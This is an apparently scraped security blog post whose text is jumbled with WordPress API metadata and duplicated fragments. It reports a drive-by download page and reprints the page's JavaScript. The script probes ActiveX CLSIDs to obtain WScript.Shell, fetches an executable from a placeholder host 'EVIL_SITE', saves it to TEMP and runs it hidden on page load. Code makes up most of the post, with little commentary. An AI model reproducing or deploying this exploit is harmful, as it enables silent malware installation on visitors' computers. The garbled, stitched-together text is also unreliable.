Today I found another old example of how web site operators are using browser based exploits to infect “drive by” browsers. If a user goes to the site I found today using a vulnerable browser an Iframe will deliver an advertisment which contains javascript encoded download instructions for exe’s.<\/p>\n
Observe<\/p>\n
Log('Ceating the XMLHTTP object...'); try { xml=new XMLHttpRequest(); } if (! xml) return(0);<\/p>\n Log(''); Log(''); Log('.'); function Exploit() { while (t[i]) { if (t[i].substring(0,1) == '{') { if (a) { <\/html> Today I found another old example of how web site operators are using browser based exploits to infect “drive by” browsers. If a user goes to the site I found today using a vulnerable browser an Iframe will deliver an advertisment which contains javascript encoded download instructions for exe’s. Observe function Go(a) { Log(‘Creating helper […]<\/p>\n","protected":false},"author":214,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[272],"tags":[],"class_list":["post-165","post","type-post","status-publish","format-standard","hentry","category-digital-warfare"],"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts\/165","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/users\/214"}],"replies":[{"embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/comments?post=165"}],"version-history":[{"count":0,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts\/165\/revisions"}],"wp:attachment":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/media?parent=165"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/categories?post=165"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/tags?post=165"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}function Go(a) {
\n Log('Creating helper objects...');
\n var s = CreateO(a, \"WScript.Shell\");
\n var o = CreateO(a, \"ADODB.Stream\");
\n var e = s.Environment(\"Process\");<\/p>\n
\n var url = \"http:\/\/EVIL_SITE\/adv\/168\/win32.exe\"; var xml = null;
\n var bin = e.Item(\"TEMP\")+ \"\\\\\" + \"metasploit.exe\";
\n var dat;<\/p>\n
\n catch(e) {
\n try { xml = new ActiveXObject(\"Microsoft.XMLHTTP\"); }
\n catch(e) {
\n xml = new ActiveXObject(\"MSXML2.ServerXMLHTTP\");
\n }
\n }<\/p>\n
\n xml.open(\"http:\/\/EVIL_SITE\/adv\/GET\", url, false)
\n xml.send(null);
\n dat = xml.responseBody;<\/p>\n
\n o.Type = 1;
\n o.Mode = 3;
\n o.Open();
\n o.Write(dat);
\n o.SaveToFile(bin, 2);<\/p>\n
\n s.Run(bin,0);
\n}<\/p>\n
\n var i = 0;
\n var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}',
\n'{BD96C556-65A3-11D0-983A-00C04FC29E36}',
\n'{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',
\n'{0006F033-0000-0000-C000-000000000046}',
\n'{0006F03A-0000-0000-C000-000000000046}',
\n'{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}',
\n'{6414512B-B978-451D-A0D8-FCFDF33E833C}',
\n'{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}',
\n'{06723E09-F4C2-43c8-8358-09FCD1DB0766}',
\n'{639F725F-1B2D-4831-A9FD-874847682010}',
\n'{BA018599-1DB3-44f9-83B4-461454C84BF8}',
\n'{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',
\n'{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null);<\/p>\n
\n var a = null;<\/p>\n
\n a = document.createElement(\"object\");
\n a.setAttribute(\"classid\", \"clsid:\" + t[i].substring(1, t[i].length - 1));
\n } else {
\n try { a = new ActiveXObject(t[i]); } catch(e){}
\n }<\/p>\n
\n try {
\n var b = CreateO(a, \"WScript.Shell\");
\n if (b) {
\n Log('Loaded ' + t[i]);
\n Go(a);
\n return(0);
\n }
\n } catch(e){}
\n }
\n i++;
\n }
\n Log('');
\n}
\n<\/script>
\n<\/head>
\n<body onload='Exploit()'>
\n<p><\/p>
\n<\/body><\/p>\n
\n<html>
\n<body>
\n<script>
\ndocument.write(unescape(\"[LARGE BLOCK OF HEX ENCODED DATA]\"))
\n<\/script>
\n<\/code><\/p>\n","protected":false},"excerpt":{"rendered":"